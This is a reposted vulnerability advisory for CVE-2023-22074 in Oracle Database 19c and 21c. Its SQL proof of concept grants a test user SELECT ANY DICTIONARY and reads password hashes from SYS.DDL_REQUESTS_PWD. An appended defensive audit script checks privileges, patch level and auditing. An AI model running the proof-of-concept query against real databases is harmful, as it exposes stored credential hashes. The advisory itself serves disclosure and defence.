Oracle database password hash exposure in sharding component
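A vulnerability in the Oracle Database sharding component allows a user with the create session and select any dictionary privileges to view password hashes. It affects some 19c and 21c versions, is rated low risk, and has been fixed. 2025-5-19 17:42:43 Author: cxsecurity.com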

Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11]
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
CVE Reference: CVE-2023-22074
Base Score: 2.4
Author of Advisory: Emad Al-Mousa

*****************************************
Vulnerability Details:

Vulnerability in the Oracle Database Sharding component of Oracle Database Server. An attacker who compromises an account with the create session and select any dictionary privileges can view password hashes stored in a system table that is part of the sharding component setup.

*****************************************
Proof of Concept (PoC):

I will create an account called "jim" in pluggable database ORCLPDB1 and grant the account the create session and select any dictionary privileges:

SQL> alter session set container=ORCLPDB1;

Session altered.

SQL> create user jim identified by jim123;

User created.

SQL> grant create session,select any dictionary to jim;

Grant succeeded.

I will now connect using database account "jim", and the account will be able to view the password hashes in the system table DDL_REQUESTS_PWD used by the database sharding component:

sqlplus "jim/jim123"@ORCLPDB1

SQL> show user
USER is "JIM"

SQL> select * from SYS.DDL_REQUESTS_PWD;

   DDL_NUM  PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
       123        445
E494684108560FFEF1C17CDE72F36A1A

*****************************************
References:

https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074
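A defender's audit for the exposure described in the advisory, as an added example that is not part of the original advisory or of Oracle's guidance. It assumes a DBA session in each pluggable database and unified auditing; the policy name aud_ddl_requests_pwd is a hypothetical name chosen for illustration.

```sql
-- Added example (not from the advisory). Run as a DBA inside each PDB.

-- 1. Which customer-created accounts hold SELECT ANY DICTIONARY, either
--    directly or through a chain of nested roles?
SELECT DISTINCT u.username, u.account_status
FROM  (SELECT grantee
       FROM   dba_sys_privs
       WHERE  privilege = 'SELECT ANY DICTIONARY'
       UNION
       SELECT grantee
       FROM   dba_role_privs
       START WITH granted_role IN (SELECT grantee
                                   FROM   dba_sys_privs
                                   WHERE  privilege = 'SELECT ANY DICTIONARY')
       CONNECT BY PRIOR grantee = granted_role) g
JOIN   dba_users u ON u.username = g.grantee
WHERE  u.oracle_maintained = 'N'
ORDER  BY u.username;

-- 2. Does the sharding table hold any rows in this container?
--    Only a count is taken, so ENC_PWD is never displayed.
SELECT COUNT(*) AS stored_entries FROM sys.ddl_requests_pwd;

-- 3. Release update level, to compare with the affected range in the
--    advisory (19.3-19.20 and 21.3-21.11).
SELECT version_full FROM v$instance;
SELECT patch_id, action, status, action_time, description
FROM   dba_registry_sqlpatch
ORDER  BY action_time;

-- 4. Record every read of the table (policy name is hypothetical).
CREATE AUDIT POLICY aud_ddl_requests_pwd
  ACTIONS SELECT ON sys.ddl_requests_pwd;
AUDIT POLICY aud_ddl_requests_pwd;

-- 5. Review who has read the table since the policy was enabled.
SELECT event_timestamp, dbusername, action_name, sql_text
FROM   unified_audit_trail
WHERE  object_schema = 'SYS'
AND    object_name   = 'DDL_REQUESTS_PWD'
ORDER  BY event_timestamp;
```

Accounts returned by query 1 that have no operational need for dictionary access are candidates for revoking the privilege, independent of patch status.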





 



Article source: https://cxsecurity.com/issue/WLB-2025050036